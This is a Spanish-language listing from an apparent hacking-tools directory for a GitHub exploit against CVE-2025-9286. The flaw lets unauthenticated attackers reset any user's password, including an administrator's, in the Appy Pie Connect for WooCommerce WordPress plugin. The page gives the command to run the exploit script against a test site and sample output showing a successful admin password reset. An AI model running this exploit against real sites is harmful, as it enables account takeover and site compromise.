Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-9286 — Appy Pie Connect for WooCommerce <= 1.1.2 - Falta de autorización para escalada de privilegios no autenticada | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-9286
Escalada de PrivilegiosAtaques de ContraseñasExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - Falta de autorización para escalada de privilegios no autenticada

Ver Repositorio
10hace 0 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - Falta de autorización para escalada de privilegios no autenticada

⚠️ Appy Pie Connect para WooCommerce <= 1.1.2 - Falta de autorización para escalada de privilegios no autenticada mediante reset_user_password

📝 Descripción

El plugin Appy Pie Connect for WooCommerce para WordPress es vulnerable a la escalada de privilegios debido a la falta de autorización en el controlador REST reset_user_password() en todas las versiones hasta la 1.1.2 inclusive.
Esto permite a atacantes no autenticados restablecer la contraseña de usuarios arbitrarios, incluidos los administradores, obteniendo así acceso administrativo.

  • CVE: CVE-2025-9286
  • CVSS: 9.8 (Crítico)

💻 Script del exploit

El siguiente exploit se puede utilizar para aprovechar la CVE-2025-9286 contra sitios WordPress que ejecuten la versión vulnerable del plugin.

Nombre del script: CVE-2025-9286.py

⚙️ Uso

python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 Salida de muestra (explotación exitosa)

[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.

📬 Contacto y comunidad

  • 📨 Telegram: @Kxploit
  • 📡 Canal de Telegram: @KNxploited

⚠️ Descargo de responsabilidad

Este exploit es solo para fines de pruebas de penetración educativas y autorizadas.
El uso no autorizado contra sistemas sin permiso explícito es ilegal.
El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.


Por: Khaled Alenazi (Nxploited)

Descargar herramienta